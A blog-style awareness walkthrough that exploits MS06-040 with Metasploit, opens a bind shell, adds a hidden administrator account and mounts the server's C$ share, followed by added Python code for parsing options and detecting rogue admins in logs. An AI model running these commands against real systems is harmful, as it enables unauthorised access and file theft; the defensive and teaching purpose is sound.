
It would have been irresponsible of me to write this any earlier, but a few days have passed and hopefully the majority have installed the appropriate patch, or at the very least are running personal/perimeter firewalls until they complete their change control.

Many may have seen e-mail alerts and news articles that say "exploit in the wild" and may not appreciate what this actually means. You hear people say "It'll never happen to me" or "it's only geeky Linux kids who can do this, my business isn't at risk"; OK, but do you know how easy it actually is?

Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck, I'm using Linux now, so I'm not going to argue!), but many tools have been ported to Windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly Windows literate, how difficult is it to point & click? Are you concerned yet?

Myth Number 2: Hacking is hard. Proper hacking, finding exploits in code, yes; but what the public means by hacking, like copying files off your PC, no. I'm going to show you how to use a Windows PC to hack a vulnerable server and create an administrator account which will let you copy the contents of the server's hard drive.

OK, so "exploit in the wild" means a popular hacking website has published a working exploit; in the case of MS06-040, Milw0rm did. What made this exploit interesting is that it was published as a module for the popular pen testing tool Metasploit, which, yep you guessed it, runs on Windows!

So to get started, download and install metasploit (I'll be using Framework 2.6).

Once that's installed you'll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate, and watch it do its thing (Linux or Mac people need to run msfupdate -u). During the update you'll see what it downloads; in Windows world you have to be quick, as the window closes when it's finished updating, but Linux users will be able to see that this is the exploit as published on Milw0rm.

Now there is a web GUI to Metasploit Framework, but (i) I didn't find it that easy to use & (ii) it's quite difficult to write an article saying point & click :wink: , so to hack (and I use the term loosely) we're going to use the console, which is a little like a router console: limited commands, not as overwhelming as a full command shell/terminal. So Windows users start -> metasploit framework -> msfconsole (Mac & Linux, just type msfconsole), and you'll get a black box that looks a little like this:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}

                 (metasploit ASCII-art banner)

       + -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

msf >
```

So to get started, you can just type *help* to see a list of commands:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf > help

Metasploit Framework Main Console Help

        ?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version
```

*show exploits* will give a list of available exploits, and we want netapi_ms06_040, so type *use netapi_ms06_040* and notice how the prompt changes:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf > use netapi_ms06_040
msf netapi_ms06_040 >
```

Right, the next thing you need is something to attack. I've got a Windows 2000 Server SP4 box waiting at a known IP address, so to tell metasploit what to attack you need to set a remote host variable. For the unfamiliar, a variable is a word that represents something (*I'm not a programmer, so sorry for the crap definition*), so we're going to set the word RHOST to that address:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040 > set RHOST
msf netapi_ms06_040 >
```

The final thing to do is to set up a payload. A payload is what you want to happen after you've exploited the target; *show payloads* lists them:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040 > show payloads

Metasploit Framework Usable Payloads

  win32_adduser                 Windows Execute net user /ADD
  win32_bind                    Windows Bind Shell
  win32_bind_dllinject          Windows Bind DLL Inject
  win32_bind_meterpreter        Windows Bind Meterpreter DLL Inject
  win32_bind_stg                Windows Staged Bind Shell
  win32_bind_stg_upexec         Windows Staged Bind Upload/Execute
  win32_bind_vncinject          Windows Bind VNC Server DLL Inject
  win32_downloadexec            Windows Executable Download and Execute
  win32_exec                    Windows Execute Command
  win32_reverse                 Windows Reverse Shell
  win32_reverse_dllinject       Windows Reverse DLL Inject
  win32_reverse_meterpreter     Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord             Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject   Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg             Windows Staged Reverse Shell
  win32_reverse_stg_upexec      Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject       Windows Reverse VNC Server Inject
```

That gives a nice list of what's available, anything from command shells to full VNC GUIs. I'm going to pick the simplest, which is win32_bind; when successful, this will turn our metasploit console into a command prompt (start -> run -> cmd.exe) on the attacked machine, thus allowing us to run any commands we like! (One caveat: a bind payload makes the *target* listen on a new port, LPORT 4444 by default, so a host firewall that blocks unsolicited inbound connections stops it; the win32_reverse* payloads connect back to you instead.)

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf netapi_ms06_040(win32_bind) >
```

Before we go any further it's best to check we've got everything; the *show options* command is massively useful because it shows us what settings (or variables) we need to set before an exploit will work.

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040(win32_bind) > show options

Exploit and Payload Options

  Exploit:    Name      Default    Description
  --------    ------    -------    ---------------------------------------
  required    RHOST                The target address
  optional    SMBDOM               The domain for specified SMB username
  optional    SMBUSER              The SMB username to connect with
  optional    SMBPASS              The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

msf netapi_ms06_040(win32_bind) >
```

As you can see, RHOST is the only thing we had to set ourselves: the SMB* options are optional (so we'll ignore them), the payload's required options EXITFUNC and LPORT already have defaults, and the target has been picked automatically for us :-)
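Before typing *exploit* it is worth being able to read, in script form, exactly what *show options* is telling you. The following is an added example, not part of the original post and not Metasploit's own code: a small parser for the 2.x show options table, fed the sample output above, that reports which required options still have no value. Column boundaries are taken from each section's header line, so an empty Default cell is detected reliably; the address 10.0.0.5 used for the "after set RHOST" variant is made up.

```python
import re

# Constructed sample (not captured from a real session): the "show options"
# output from the walkthrough, before RHOST has been set.
SHOW_OPTIONS_UNSET = """\
Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ---------------------------------------
  required    RHOST                The target address
  optional    SMBDOM               The domain for specified SMB username
  optional    SMBUSER              The SMB username to connect with
  optional    SMBPASS              The password for specified SMB username

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
"""

# The same dump after "set RHOST 10.0.0.5" (10.0.0.5 is a made-up address;
# the cell is padded so the columns stay aligned).
SHOW_OPTIONS_SET = SHOW_OPTIONS_UNSET.replace(
    "RHOST                The target address",
    "RHOST     10.0.0.5   The target address")

HEADER_RE = re.compile(r"^\s*(\w+):\s+Name\s+Default\s+Description")
ROW_RE = re.compile(r"^\s*(required|optional)\s")


def parse_show_options(text):
    """Parse a Metasploit 2.x 'show options' dump into a list of dicts.

    Each section (Exploit, Payload) has its own header line; the character
    offsets of Name / Default / Description in that header define the
    columns, so a blank Default cell (an unset option) comes back as "".
    """
    rows, section, cols = [], None, None
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            section = header.group(1)
            cols = tuple(line.index(h) for h in ("Name", "Default", "Description"))
            continue
        if cols is None or not ROW_RE.match(line):
            continue
        name_at, default_at, desc_at = cols
        rows.append({
            "section": section,
            "required": line.strip().startswith("required"),
            "name": line[name_at:default_at].strip(),
            "default": line[default_at:desc_at].strip(),
            "description": line[desc_at:].strip(),
        })
    return rows


def missing_required(text):
    """Names of required options with no value: these must be 'set' before 'exploit'."""
    return [r["name"] for r in parse_show_options(text)
            if r["required"] and not r["default"]]


if __name__ == "__main__":
    print("still to set:", missing_required(SHOW_OPTIONS_UNSET))   # ['RHOST']
    print("still to set:", missing_required(SHOW_OPTIONS_SET))     # []
```

The same check is what the console does for you when you type *exploit* with something missing; having it as a function is useful once you start driving the framework from a script rather than by hand.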

So the final touch is to hack ! Type *exploit*

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
msf netapi_ms06_040(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from <->

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
```


Success! (Pat yourself on the back!) You now have a working command line. Now, if you're not that literate with the Windows command line you may think, so what!?! Well, take a look at the following: we'll set up a user called h4x0r with password P455w0rd and add him/her to the administrators group:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
C:\WINNT\system32>net user h4x0r P455w0rd /add
net user h4x0r P455w0rd /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators h4x0r /add
net localgroup administrators h4x0r /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.
```


Now we have an administrator on that machine we can pretty much do what we like, so Windows users can mount the "C" drive as a remote hard drive and copy & read any file they like. So <u>from your PC **where metasploit is installed**</u> click start -> run, type cmd.exe (notice how the shell looks the same as the metasploit one?) and type:

``` {style="background:black;color:white;padding:0.1em;border:solid #0000AA"}
net use x: \\\c$ P455w0rd /user:h4x0r
```

Finally, Windows people, under "My Computer" on your machine you now have an "X" drive that is the server you attacked! (Linux users, you'll have to use Samba to do the same; sorry Mac'ers, I don't know for you!)
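The other side of this, for whoever looks after that server: everything the walkthrough just did leaves a trail in the Windows 2000 Security log, provided account management and logon/logoff auditing are switched on. The detector below is an added example, not from the original post; it runs over a constructed CSV export (the column layout is an assumption for this example, not a real export format) of three real Windows 2000/2003 event types: 624 User Account Created, 636 Security Enabled Local Group Member Added and 540 Successful Network Logon. It assumes a host called WEBSRV and an attacker address of 10.0.0.9, and that an account created from inside the exploited Server service is logged with the machine account (WEBSRV$) as the caller, because that service runs as LocalSystem.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed sample rows, not real logs. Columns: time, event_id, caller
# (who performed the action), target (account or group acted on), extra
# (member added for 636, source address for 540). The jsmith rows are a
# normal help-desk account creation for contrast; the h4x0r rows mirror the
# net user / net localgroup / net use sequence from the walkthrough.
SAMPLE_LOG = """\
time,event_id,caller,target,extra
2006-08-14 09:02:11,624,WEBSRV\\Administrator,jsmith,new help-desk account
2006-08-14 22:10:03,624,WEBSRV\\WEBSRV$,h4x0r,
2006-08-14 22:10:19,636,WEBSRV\\WEBSRV$,Administrators,h4x0r
2006-08-14 22:11:40,540,,h4x0r,10.0.0.9
2006-08-15 08:30:00,540,,jsmith,10.0.0.23
"""

EVENT_ACCOUNT_CREATED = 624
EVENT_LOCAL_GROUP_MEMBER_ADDED = 636
EVENT_NETWORK_LOGON = 540

# Correlation windows (assumed thresholds; tune to your environment).
CREATE_TO_ADMIN = timedelta(minutes=10)
CREATE_TO_LOGON = timedelta(hours=1)


def detect_rogue_admins(csv_text):
    """Return [(account, reason), ...] for activity matching the post-exploitation pattern.

    Three rules, in the order the attacker's commands happen:
      1. account created by the machine/SYSTEM account (a person creates
         accounts as themselves; code running inside a service does not);
      2. that new account put in Administrators within CREATE_TO_ADMIN;
      3. a network logon (e.g. mapping C$) by the new account within
         CREATE_TO_LOGON of its creation.
    """
    created = {}  # account -> creation time
    alerts = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        when = datetime.strptime(row["time"], "%Y-%m-%d %H:%M:%S")
        event_id = int(row["event_id"])
        if event_id == EVENT_ACCOUNT_CREATED:
            account = row["target"]
            created[account] = when
            # Assumption: a LocalSystem caller appears as the machine
            # account, i.e. a name ending in "$".
            if row["caller"].rstrip().endswith("$"):
                alerts.append((account, "account created by the machine/SYSTEM account"))
        elif (event_id == EVENT_LOCAL_GROUP_MEMBER_ADDED
              and row["target"].lower() == "administrators"):
            member = row["extra"]
            if member in created and when - created[member] <= CREATE_TO_ADMIN:
                alerts.append((member, "added to Administrators within 10 min of creation"))
        elif event_id == EVENT_NETWORK_LOGON:
            account = row["target"]
            if account in created and when - created[account] <= CREATE_TO_LOGON:
                alerts.append((account, "network logon from %s shortly after creation" % row["extra"]))
    return alerts


if __name__ == "__main__":
    for account, reason in detect_rogue_admins(SAMPLE_LOG):
        print("ALERT %-8s %s" % (account, reason))
```

Replace SAMPLE_LOG with a real export to use it; the first rule is the sharpest signal on its own, since help-desk staff create accounts as themselves and never as SYSTEM, and it fires before the attacker has even mapped the drive.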

In Summary
Yes, this is a little long winded, but if you've read it you'll see how easy it actually was: download a hacker program, install it, type a couple of commands, and copy your victim's files. Now do you think this is beyond anyone on your IT department's help-desk? Do you really think they should be copying files off the CEO's laptop?

It is my hope that, with all the news hype and articles like this, people will follow basic security practices at home as well as at work, thus making a better Internet for us all! :cool:



Nick Bettison ©